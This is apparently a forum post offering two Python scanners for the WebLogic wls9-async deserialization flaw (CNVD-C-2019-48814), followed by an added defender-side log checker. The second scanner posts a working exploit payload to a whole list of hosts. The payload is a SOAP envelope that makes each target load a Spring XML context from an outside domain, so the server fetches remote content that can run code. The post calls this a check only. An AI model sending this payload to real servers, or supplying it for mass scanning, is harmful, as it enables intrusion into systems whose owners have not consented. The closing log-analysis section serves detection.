Vulnerability details: http://www.onebug.org/toinformation/74219.html
Vulnerability details: http://www.onebug.org/toinformation/74208.html

Usage:

python3 CNVD-C-2019-48814.py filename.txt
IP format: 192.168.137.201:7001

This version only checks whether the path exists, so it is not very accurate.

#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# CNVD-C-2019-48814  from http://www.cnvd.org.cn/webinfo/show/4999

import requests
import sys

path='/_async/AsyncResponseService'

print('\n')
print(r'                  Author:ximcx               ')
print(r'              CNVD-C-2019-48814              ')
print(r'   http://www.cnvd.org.cn/webinfo/show/4999  ')
print('\n')

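# Open the target file, read each host:port and send the request.
# '存在漏洞的地址.txt' ("vulnerable addresses") collects the hosts that matched.
with open(sys.argv[1],'r') as f, open('存在漏洞的地址.txt','w') as f1:
    for ff in f:
        target=ff.strip()
        if not target:
            continue  # skip blank lines
        try:
            r=requests.get('http://'+target+path,timeout=3)  # all requests default to plain http
            # HTTP 200 only shows that the endpoint is reachable
            if(r.status_code==200):
                # Message: "wls9-async component deserialization vulnerability present"
                print('[+]'+target+'存在wls9-async组件反序列化漏洞')
                f1.write(target+'\n')
            else:
                print('[-]不存在漏洞')  # "not vulnerable"
        except requests.exceptions.RequestException:
            print('[-]'+target+'连接超时')  # "connection timed out"
            continue
print('\n\n请查看目录下的:存在漏洞的地址.txt')  # "see 存在漏洞的地址.txt in the current directory"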

This version sends a POST payload and is more accurate.
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# CNVD-C-2019-48814  from http://www.cnvd.org.cn/webinfo/show/4999
import requests
import sys


print('\n')
print(r'                  Author:ximcx               ')
print(r'              CNVD-C-2019-48814              ')
print(r'   http://www.cnvd.org.cn/webinfo/show/4999  ')
print('\n')

path='/_async/AsyncResponseService'
payload='<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string><void><string>http://ximcx.cn</string></void></class></java>    </work:WorkContext>   </soapenv:Header>   <soapenv:Body>      <asy:onAsyncDelivery/>   </soapenv:Body></soapenv:Envelope>'

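# Open the target file, read each host:port and send the request.
# '存在漏洞的地址.txt' ("vulnerable addresses") collects the hosts that matched.
header={'content-type':'text/xml'}
with open(sys.argv[1],'r') as f, open('存在漏洞的地址.txt','w') as f1:
    for ff in f:
        target=ff.strip()
        if not target:
            continue  # skip blank lines
        try:
            r=requests.post('http://'+target+path,headers=header,data=payload,timeout=3)  # all requests default to plain http
            # HTTP 202 (Accepted) is treated as the vulnerable response
            if(r.status_code==202):
                # Message: "wls9-async component deserialization vulnerability present"
                print('[+]'+target+'存在wls9-async组件反序列化漏洞')
                f1.write(target+'\n')
            else:
                print('[-]不存在漏洞')  # "not vulnerable"
        except requests.exceptions.RequestException:
            print('[-]'+target+'连接超时')  # "connection timed out"
            continue
print('\n\n请查看目录下的:存在漏洞的地址.txt')  # "see 存在漏洞的地址.txt in the current directory"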

It has also been compiled to an exe. Note that it only checks whether the vulnerability exists; it does not get a shell.
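
Added example (not part of the original post or the author's tool): a defender-side check that scans a web access log for requests to the /_async/ path both scripts probe, and labels each hit by the same status codes the scripts test for. The Common Log Format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Path prefix probed by both scripts on this page.
ASYNC_PREFIX = "/_async/"

# Assumed log format: Common Log Format
#   host ident user [time] "METHOD path proto" status bytes
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

def classify(method, status):
    """Map a request to the /_async/ endpoint onto the two checks shown above."""
    if method == "POST" and status == 202:
        return "payload-accepted"   # what the POST version reports as vulnerable
    if method == "GET" and status == 200:
        return "endpoint-exposed"   # what the path-only version reports
    return "probe-rejected"         # endpoint touched but blocked, absent or erroring

def find_async_probes(lines):
    """Return {source: [(timestamp, method, path, status, verdict), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        path = m["path"].split("?", 1)[0]
        if not path.lower().startswith(ASYNC_PREFIX):
            continue
        status = int(m["status"])
        verdict = classify(m["method"], status)
        hits[m["src"]].append((m["ts"], m["method"], path, status, verdict))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [26/Apr/2019:10:46:01 +0800] "GET /_async/AsyncResponseService HTTP/1.1" 200 1024
198.51.100.7 - - [26/Apr/2019:10:46:03 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 202 0
203.0.113.20 - - [26/Apr/2019:10:50:12 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3312
203.0.113.9 - - [26/Apr/2019:11:02:44 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 404 1164
""".splitlines()

if __name__ == "__main__":
    for src, events in find_async_probes(SAMPLE_LOG).items():
        for ts, method, path, status, verdict in events:
            print(f"{src} [{ts}] {method} {path} -> {status} {verdict}")
```

A "payload-accepted" hit means the server answered the same way the POST version above treats as vulnerable, so that host should be reviewed first.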
